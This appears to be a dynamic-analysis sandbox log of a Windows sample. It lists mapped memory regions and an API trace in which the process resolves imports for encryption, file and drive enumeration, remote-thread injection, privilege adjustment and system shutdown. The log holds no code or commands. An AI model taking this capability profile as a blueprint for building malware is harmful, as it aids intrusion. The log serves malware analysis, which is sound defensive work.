Region: id = 2484 start_va = 0x73ae0000 end_va = 0x73b17fff entry_point = 0x73ae0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 2485 start_va = 0x2e90000 end_va = 0x2fdffff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 2486 start_va = 0x2f30000 end_va = 0x2f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2487 start_va = 0x2fa0000 end_va = 0x2fdffff entry_point = 0x0 region_type = private name = "private_0x0000000002fa0000" filename = "" Region: id = 2488 start_va = 0x33a0000 end_va = 0x33dffff entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 2489 start_va = 0x7ef8c000 end_va = 0x7ef8efff entry_point = 0x0 region_type = private name = "private_0x000000007ef8c000" filename = "" Region: id = 2490 start_va = 0x74500000 end_va = 0x74507fff entry_point = 0x74500000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 2491 start_va = 0x73aa0000 end_va = 0x73ad7fff entry_point = 0x73aa0000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 2492 start_va = 0x744e0000 end_va = 0x744f6fff entry_point = 0x744e0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2493 start_va = 0x73a60000 end_va = 0x73a9cfff entry_point = 0x73a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2494 start_va = 0x73a00000 end_va = 0x73a15fff entry_point = 0x73a00000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll") Region: id = 2495 start_va = 0x739e0000 end_va = 0x739fbfff entry_point = 0x739e0000 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\SysWOW64\\cryptnet.dll" (normalized: "c:\\windows\\syswow64\\cryptnet.dll") Region: id = 2496 start_va = 0x76900000 end_va = 0x76a9cfff entry_point = 0x76900000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 2497 start_va = 0x768a0000 end_va = 0x768c6fff entry_point = 0x768a0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2498 start_va = 0x76c20000 end_va = 0x76c31fff entry_point = 0x76c20000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 2499 start_va = 0x739c0000 end_va = 0x739d4fff entry_point = 0x739c0000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\SysWOW64\\cabinet.dll" (normalized: "c:\\windows\\syswow64\\cabinet.dll") Region: id = 2500 start_va = 0x73a50000 end_va = 0x73a5dfff entry_point = 0x73a50000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\SysWOW64\\devrtl.dll" (normalized: "c:\\windows\\syswow64\\devrtl.dll") Region: id = 2501 start_va = 0x76900000 end_va = 0x76a9cfff entry_point = 0x76900000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 2502 start_va = 0x768a0000 end_va = 0x768c6fff entry_point = 0x768a0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2503 start_va = 0x76c20000 end_va = 0x76c31fff entry_point = 0x76c20000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 2504 start_va = 0x33e0000 end_va = 0x34dffff entry_point = 0x0 region_type = private name = "private_0x00000000033e0000" filename = "" Region: id = 2505 start_va = 0xe90000 end_va = 0xecffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 2506 start_va = 0x2e90000 end_va = 0x2ecffff entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 2507 start_va = 0x738c0000 end_va = 0x7390efff entry_point = 0x738c0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 2508 start_va = 0x73910000 end_va = 0x73967fff entry_point = 0x73910000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 2509 start_va = 0x7ef89000 end_va = 0x7ef8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 2510 start_va = 0x34e0000 end_va = 0x359ffff entry_point = 0x34e0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2511 start_va = 0x73a30000 end_va = 0x73a3cfff entry_point = 0x73a30000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 2512 start_va = 0x739a0000 end_va = 0x739b1fff entry_point = 0x739a0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 2513 start_va = 0x768a0000 end_va = 0x768c6fff entry_point = 0x768a0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2514 start_va = 0x2d0000 end_va = 0x2ddfff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 2516 start_va = 0x2d0000 end_va = 0x2d3fff entry_point = 0x2d0000 region_type = mapped_file name = "winhttp.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winhttp.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winhttp.dll.mui") Region: id = 2517 start_va = 0x2e0000 end_va = 0x2edfff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 2519 start_va = 0x2e0000 end_va = 0x2edfff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 2521 start_va = 0x76900000 end_va = 0x76a9cfff entry_point = 0x76900000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 2522 start_va = 0x76c20000 end_va = 0x76c31fff entry_point = 0x76c20000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 2523 start_va = 0x2e0000 end_va = 0x2f0fff entry_point = 0x2e0000 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 2524 start_va = 0x340000 end_va = 0x34dfff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 2526 start_va = 0x340000 end_va = 0x34dfff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 2528 start_va = 0x340000 end_va = 0x34dfff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 2530 start_va = 0x340000 end_va = 0x34dfff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 2532 start_va = 0x340000 end_va = 0x34dfff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 2558 start_va = 0x340000 end_va = 0x34dfff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 2560 start_va = 0x340000 end_va = 0x34cfff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 2562 start_va = 0x340000 end_va = 0x34cfff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 2564 start_va = 0x340000 end_va = 0x34cfff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 2566 start_va = 0x340000 end_va = 0x34cfff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 2568 start_va = 0x340000 end_va = 0x34cfff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 2576 start_va = 0x340000 end_va = 0x34cfff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Thread: id = 159 os_tid = 0x5a0 Thread: id = 160 os_tid = 0x948 [0214.928] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x759f0000 [0214.929] GetProcAddress (hModule=0x759f0000, lpProcName="TerminateThread") returned 0x75a07a2f [0214.929] GetProcAddress (hModule=0x759f0000, lpProcName="LoadLibraryA") returned 0x75a049d7 [0214.929] GetProcAddress (hModule=0x759f0000, lpProcName="DeleteFileW") returned 0x75a089b3 [0214.929] GetProcAddress (hModule=0x759f0000, lpProcName="HeapReAlloc") returned 0x772b1f6e [0214.929] GetProcAddress (hModule=0x759f0000, lpProcName="GetNativeSystemInfo") returned 0x75a110b5 [0214.929] GetProcAddress (hModule=0x759f0000, lpProcName="CreateThread") returned 0x75a034d5 [0214.929] GetProcAddress (hModule=0x759f0000, lpProcName="HeapAlloc") returned 0x7729e026 [0214.929] GetProcAddress (hModule=0x759f0000, lpProcName="HeapDestroy") returned 0x75a035b7 [0214.929] GetProcAddress (hModule=0x759f0000, lpProcName="VirtualAllocEx") returned 0x75a1d9b0 [0214.929] GetProcAddress (hModule=0x759f0000, lpProcName="LocalFree") returned 0x75a02d3c [0214.929] GetProcAddress (hModule=0x759f0000, lpProcName="DeleteCriticalSection") returned 0x772a45f5 [0214.929] GetProcAddress (hModule=0x759f0000, lpProcName="GetComputerNameW") returned 0x75a0dd0e [0214.929] GetProcAddress (hModule=0x759f0000, lpProcName="GetProcessHeap") returned 0x75a014e9 [0214.929] GetProcAddress (hModule=0x759f0000, lpProcName="SystemTimeToFileTime") returned 0x75a05a7e [0214.929] GetProcAddress (hModule=0x759f0000, lpProcName="GlobalMemoryStatusEx") returned 0x75a2d4c4 [0214.929] GetProcAddress (hModule=0x759f0000, lpProcName="CreateProcessW") returned 0x75a0103d [0214.929] GetProcAddress (hModule=0x759f0000, lpProcName="WideCharToMultiByte") returned 0x75a0170d [0214.929] GetProcAddress (hModule=0x759f0000, lpProcName="InterlockedIncrement") returned 0x75a01400 [0214.929] GetProcAddress (hModule=0x759f0000, lpProcName="GetSystemTime") returned 0x75a05a96 [0214.929] GetProcAddress (hModule=0x759f0000, lpProcName="VirtualFreeEx") returned 0x75a1d9c8 [0214.929] GetProcAddress (hModule=0x759f0000, lpProcName="IsBadReadPtr") returned 0x75a2d075 [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="lstrcmpiW") returned 0x75a1d5cd [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="OpenMutexW") returned 0x75a05151 [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="SetEndOfFile") returned 0x75a1ce2e [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="GetCurrentThread") returned 0x75a017ec [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="FlushFileBuffers") returned 0x75a0469b [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="RemoveVectoredExceptionHandler") returned 0x772e5f41 [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="GetCurrentProcess") returned 0x75a01809 [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="SetErrorMode") returned 0x75a01b00 [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="GetVersionExW") returned 0x75a01ae5 [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="DuplicateHandle") returned 0x75a01886 [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="GetModuleHandleA") returned 0x75a01245 [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="AddVectoredExceptionHandler") returned 0x772e742b [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="ExitProcess") returned 0x75a07a10 [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="GetCurrentProcessId") returned 0x75a011f8 [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="CopyFileW") returned 0x75a2830d [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="lstrcmpiA") returned 0x75a03e8e [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="IsWow64Process") returned 0x75a0195e [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="FindFirstChangeNotificationW") returned 0x75a1d851 [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="FindNextChangeNotification") returned 0x75a25c1e [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="IsProcessInJob") returned 0x75a2c7ea [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="CreateRemoteThread") returned 0x75a8416b [0214.930] GetProcAddress (hModule=0x759f0000, lpProcName="CreateNamedPipeW") returned 0x75a8414b [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="DisconnectNamedPipe") returned 0x75a841df [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="ConnectNamedPipe") returned 0x75a840fb [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="GetLogicalDrives") returned 0x75a05371 [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="GetDriveTypeW") returned 0x75a0418b [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="GetUserDefaultUILanguage") returned 0x75a044ab [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="CopyFileExW") returned 0x75a23b92 [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="GetEnvironmentVariableW") returned 0x75a01b48 [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="SetFilePointer") returned 0x75a017d1 [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="InitializeCriticalSection") returned 0x772a2c42 [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="GetTimeZoneInformation") returned 0x75a0465a [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="MultiByteToWideChar") returned 0x75a0192e [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="SetFileAttributesW") returned 0x75a1d4f7 [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="GetVolumeNameForVolumeMountPointW") returned 0x75a1052f [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="OpenProcess") returned 0x75a01986 [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="GetFileTime") returned 0x75a04407 [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="ReleaseMutex") returned 0x75a0111e [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="LeaveCriticalSection") returned 0x77292270 [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="GetModuleFileNameW") returned 0x75a04950 [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="SetFileTime") returned 0x75a1ecbb [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="RemoveDirectoryW") returned 0x75a844cf [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="VirtualAlloc") returned 0x75a01856 [0214.931] GetProcAddress (hModule=0x759f0000, lpProcName="ExpandEnvironmentStringsW") returned 0x75a04173 [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="WriteFile") returned 0x75a01282 [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="FindNextFileW") returned 0x75a054ee [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="EnterCriticalSection") returned 0x772922b0 [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="GetFileAttributesW") returned 0x75a01b18 [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="FindClose") returned 0x75a04442 [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="OpenEventW") returned 0x75a015d6 [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="GetTempPathW") returned 0x75a1d4dc [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="SetLastError") returned 0x75a011a9 [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="HeapFree") returned 0x75a014c9 [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="HeapCreate") returned 0x75a04a2d [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="WriteProcessMemory") returned 0x75a1d9e0 [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="GetFileSizeEx") returned 0x75a059e2 [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="FindFirstFileW") returned 0x75a04435 [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="InterlockedExchange") returned 0x75a01462 [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="GetVolumeInformationW") returned 0x75a1c860 [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="ReadFile") returned 0x75a03ed3 [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="CreateDirectoryW") returned 0x75a04259 [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="FreeLibrary") returned 0x75a034c8 [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="GetModuleHandleW") returned 0x75a034b0 [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="GetProcAddress") returned 0x75a01222 [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="LoadLibraryW") returned 0x75a0492b [0214.932] GetProcAddress (hModule=0x759f0000, lpProcName="Process32FirstW") returned 0x75a28baf [0214.933] GetProcAddress (hModule=0x759f0000, lpProcName="Process32NextW") returned 0x75a2896c [0214.933] GetProcAddress (hModule=0x759f0000, lpProcName="GetLastError") returned 0x75a011c0 [0214.933] GetProcAddress (hModule=0x759f0000, lpProcName="CreateToolhelp32Snapshot") returned 0x75a2735f [0214.933] GetProcAddress (hModule=0x759f0000, lpProcName="CreateFileW") returned 0x75a03f5c [0214.933] GetProcAddress (hModule=0x759f0000, lpProcName="CreateMutexW") returned 0x75a0424c [0214.933] GetProcAddress (hModule=0x759f0000, lpProcName="ResetEvent") returned 0x75a016dd [0214.933] GetProcAddress (hModule=0x759f0000, lpProcName="CloseHandle") returned 0x75a01410 [0214.933] GetProcAddress (hModule=0x759f0000, lpProcName="SetEvent") returned 0x75a016c5 [0214.933] GetProcAddress (hModule=0x759f0000, lpProcName="Sleep") returned 0x75a010ff [0214.933] GetProcAddress (hModule=0x759f0000, lpProcName="CreateEventW") returned 0x75a0183e [0214.933] GetProcAddress (hModule=0x759f0000, lpProcName="WaitForSingleObject") returned 0x75a01136 [0214.933] GetProcAddress (hModule=0x759f0000, lpProcName="WaitForMultipleObjects") returned 0x75a04220 [0214.933] GetProcAddress (hModule=0x759f0000, lpProcName="GetTickCount") returned 0x75a0110c [0214.933] GetProcAddress (hModule=0x759f0000, lpProcName="VirtualFree") returned 0x75a0186e [0214.933] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x75790000 [0214.949] GetProcAddress (hModule=0x75790000, lpProcName="GetIconInfo") returned 0x757b49ea [0214.949] GetProcAddress (hModule=0x75790000, lpProcName="DrawIcon") returned 0x757b8deb [0214.949] GetProcAddress (hModule=0x75790000, lpProcName="LoadImageW") returned 0x757afbd1 [0214.949] GetProcAddress (hModule=0x75790000, lpProcName="GetCursorPos") returned 0x757b1218 [0214.949] GetProcAddress (hModule=0x75790000, lpProcName="DefWindowProcW") returned 0x772a25dd [0214.949] GetProcAddress (hModule=0x75790000, lpProcName="CreateWindowExW") returned 0x757a8a29 [0214.949] GetProcAddress (hModule=0x75790000, lpProcName="UnregisterClassW") returned 0x757a9f84 [0214.949] GetProcAddress (hModule=0x75790000, lpProcName="GetKeyboardLayoutList") returned 0x757b2e69 [0214.949] GetProcAddress (hModule=0x75790000, lpProcName="CharLowerA") returned 0x757b3e75 [0214.949] GetProcAddress (hModule=0x75790000, lpProcName="CharToOemW") returned 0x75801a26 [0214.949] GetProcAddress (hModule=0x75790000, lpProcName="TranslateMessage") returned 0x757a7809 [0214.950] GetProcAddress (hModule=0x75790000, lpProcName="PeekMessageW") returned 0x757b05ba [0214.950] GetProcAddress (hModule=0x75790000, lpProcName="DispatchMessageW") returned 0x757a787b [0214.950] GetProcAddress (hModule=0x75790000, lpProcName="MsgWaitForMultipleObjects") returned 0x757b0b4a [0214.950] GetProcAddress (hModule=0x75790000, lpProcName="RegisterClassExW") returned 0x757ab17d [0214.950] GetProcAddress (hModule=0x75790000, lpProcName="SetWindowLongA") returned 0x757b6110 [0214.950] GetProcAddress (hModule=0x75790000, lpProcName="GetWindowLongA") returned 0x757ad156 [0214.950] GetProcAddress (hModule=0x75790000, lpProcName="CharUpperW") returned 0x757af350 [0214.950] GetProcAddress (hModule=0x75790000, lpProcName="DestroyWindow") returned 0x757a9a55 [0214.950] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x758d0000 [0214.952] GetProcAddress (hModule=0x758d0000, lpProcName="CryptImportPublicKeyInfo") returned 0x758e6c0e [0214.952] GetProcAddress (hModule=0x758d0000, lpProcName="CryptDecodeObjectEx") returned 0x758dd718 [0214.952] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x756e0000 [0214.952] GetProcAddress (hModule=0x756e0000, lpProcName="RegCloseKey") returned 0x756f469d [0214.952] GetProcAddress (hModule=0x756e0000, lpProcName="GetAce") returned 0x756f45f0 [0214.952] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x7570779b [0214.952] GetProcAddress (hModule=0x756e0000, lpProcName="GetSidSubAuthorityCount") returned 0x756f0e0c [0214.952] GetProcAddress (hModule=0x756e0000, lpProcName="AllocateAndInitializeSid") returned 0x756f40e6 [0214.952] GetProcAddress (hModule=0x756e0000, lpProcName="GetSidSubAuthority") returned 0x756f0e24 [0214.952] GetProcAddress (hModule=0x756e0000, lpProcName="SetEntriesInAclW") returned 0x756f2a66 [0214.953] GetProcAddress (hModule=0x756e0000, lpProcName="RegCreateKeyExW") returned 0x756f40fe [0214.953] GetProcAddress (hModule=0x756e0000, lpProcName="CryptVerifySignatureW") returned 0x756ec54a [0214.953] GetProcAddress (hModule=0x756e0000, lpProcName="SetNamedSecurityInfoW") returned 0x756e9fe2 [0214.953] GetProcAddress (hModule=0x756e0000, lpProcName="GetNamedSecurityInfoW") returned 0x756ef4fd [0214.953] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756edf4e [0214.953] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756edf36 [0214.953] GetProcAddress (hModule=0x756e0000, lpProcName="SetSecurityDescriptorSacl") returned 0x756f4680 [0214.953] GetProcAddress (hModule=0x756e0000, lpProcName="RegSetValueExW") returned 0x756f14d6 [0214.953] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756edf66 [0214.953] GetProcAddress (hModule=0x756e0000, lpProcName="OpenProcessToken") returned 0x756f4304 [0214.953] GetProcAddress (hModule=0x756e0000, lpProcName="FreeSid") returned 0x756f412e [0214.953] GetProcAddress (hModule=0x756e0000, lpProcName="InitializeSecurityDescriptor") returned 0x756f4620 [0214.953] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyExW") returned 0x756f468d [0214.953] GetProcAddress (hModule=0x756e0000, lpProcName="CryptImportKey") returned 0x756ec532 [0214.953] GetProcAddress (hModule=0x756e0000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned 0x756f1f59 [0214.953] GetProcAddress (hModule=0x756e0000, lpProcName="OpenThreadToken") returned 0x756f432c [0214.953] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryValueExW") returned 0x756f46ad [0214.954] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ee124 [0214.954] GetProcAddress (hModule=0x756e0000, lpProcName="GetTokenInformation") returned 0x756f431c [0214.954] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ec51a [0214.954] GetProcAddress (hModule=0x756e0000, lpProcName="AdjustTokenPrivileges") returned 0x756f418e [0214.954] GetProcAddress (hModule=0x756e0000, lpProcName="SetSecurityDescriptorDacl") returned 0x756f415e [0214.954] GetProcAddress (hModule=0x756e0000, lpProcName="GetSecurityDescriptorSacl") returned 0x756f4608 [0214.954] GetProcAddress (hModule=0x756e0000, lpProcName="LookupPrivilegeValueW") returned 0x756f41b3 [0214.954] GetProcAddress (hModule=0x756e0000, lpProcName="GetLengthSid") returned 0x756f413b [0214.954] GetProcAddress (hModule=0x756e0000, lpProcName="RegDeleteValueW") returned 0x756ecf31 [0214.954] GetProcAddress (hModule=0x756e0000, lpProcName="RegFlushKey") returned 0x7570773f [0214.954] GetProcAddress (hModule=0x756e0000, lpProcName="RegNotifyChangeKeyValue") returned 0x756ee15b [0214.954] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryInfoKeyW") returned 0x756f46e7 [0214.954] GetProcAddress (hModule=0x756e0000, lpProcName="RegEnumKeyW") returned 0x756f445b [0214.954] GetProcAddress (hModule=0x756e0000, lpProcName="InitiateSystemShutdownExW") returned 0x7573db3a [0214.954] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextW") returned 0x756edf14 [0214.954] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75c50000 [0214.956] GetProcAddress (hModule=0x75c50000, lpProcName="ShellExecuteW") returned 0x75c63c71 [0214.957] GetProcAddress (hModule=0x75c50000, lpProcName="ShellExecuteExW") returned 0x75c71e46 [0214.957] GetProcAddress (hModule=0x75c50000, lpProcName="SHGetFolderPathW") returned 0x75cd5708 [0214.957] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0214.957] GetProcAddress (hModule=0x750d0000, lpProcName="PathFileExistsW") returned 0x750e45bf [0214.957] GetProcAddress (hModule=0x750d0000, lpProcName="PathIsURLW") returned 0x750e55bf [0214.957] GetProcAddress (hModule=0x750d0000, lpProcName="PathIsDirectoryEmptyW") returned 0x7510cd81 [0214.957] GetProcAddress (hModule=0x750d0000, lpProcName="StrCmpNIW") returned 0x750e4745 [0214.957] GetProcAddress (hModule=0x750d0000, lpProcName="PathRenameExtensionW") returned 0x7510d32a [0214.957] GetProcAddress (hModule=0x750d0000, lpProcName="StrStrIW") returned 0x750e46e9 [0214.957] GetProcAddress (hModule=0x750d0000, lpProcName="PathMatchSpecW") returned 0x750e86f7 [0214.957] GetProcAddress (hModule=0x750d0000, lpProcName="PathCombineW") returned 0x750ec39c [0214.957] GetProcAddress (hModule=0x750d0000, lpProcName="PathRemoveFileSpecW") returned 0x750e3248 [0214.957] GetProcAddress (hModule=0x750d0000, lpProcName="PathAddBackslashW") returned 0x750ec177 [0214.957] GetProcAddress (hModule=0x750d0000, lpProcName="wvnsprintfW") returned 0x7511066c [0214.958] GetProcAddress (hModule=0x750d0000, lpProcName="PathUnquoteSpacesW") returned 0x750e5331 [0214.958] GetProcAddress (hModule=0x750d0000, lpProcName="PathSkipRootW") returned 0x750ffbf5 [0214.958] GetProcAddress (hModule=0x750d0000, lpProcName="PathFindExtensionW") returned 0x750ea1b9 [0214.958] GetProcAddress (hModule=0x750d0000, lpProcName="SHDeleteValueW") returned 0x750dfcca [0214.958] GetProcAddress (hModule=0x750d0000, lpProcName="wvnsprintfA") returned 0x750fedfe [0214.958] GetProcAddress (hModule=0x750d0000, lpProcName="PathIsDirectoryW") returned 0x750dff07 [0214.958] GetProcAddress (hModule=0x750d0000, lpProcName="PathRemoveBackslashW") returned 0x750e5c62 [0214.958] GetProcAddress (hModule=0x750d0000, lpProcName="UrlUnescapeA") returned 0x750fc6fb [0214.958] GetProcAddress (hModule=0x750d0000, lpProcName="PathQuoteSpacesW") returned 0x7510ce21 [0214.958] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x74eb0000 [0214.959] GetProcAddress (hModule=0x74eb0000, lpProcName="GetModuleFileNameExW") returned 0x74eb13f0 [0214.959] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75450000 [0214.960] GetProcAddress (hModule=0x75450000, lpProcName="CLSIDFromString") returned 0x7546e599 [0214.960] GetProcAddress (hModule=0x75450000, lpProcName="CoInitializeEx") returned 0x754909ad [0214.960] GetProcAddress (hModule=0x75450000, lpProcName="CreateStreamOnHGlobal") returned 0x7547363b [0214.960] GetProcAddress (hModule=0x75450000, lpProcName="CoSetProxyBlanket") returned 0x75465ea5 [0214.960] GetProcAddress (hModule=0x75450000, lpProcName="CoCreateInstance") returned 0x75499d0b [0214.960] GetProcAddress (hModule=0x75450000, lpProcName="CoUninitialize") returned 0x754986d3 [0214.960] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75130000 [0214.961] GetProcAddress (hModule=0x75130000, lpProcName="DeleteObject") returned 0x75145689 [0214.961] GetProcAddress (hModule=0x75130000, lpProcName="GetDeviceCaps") returned 0x75144de0 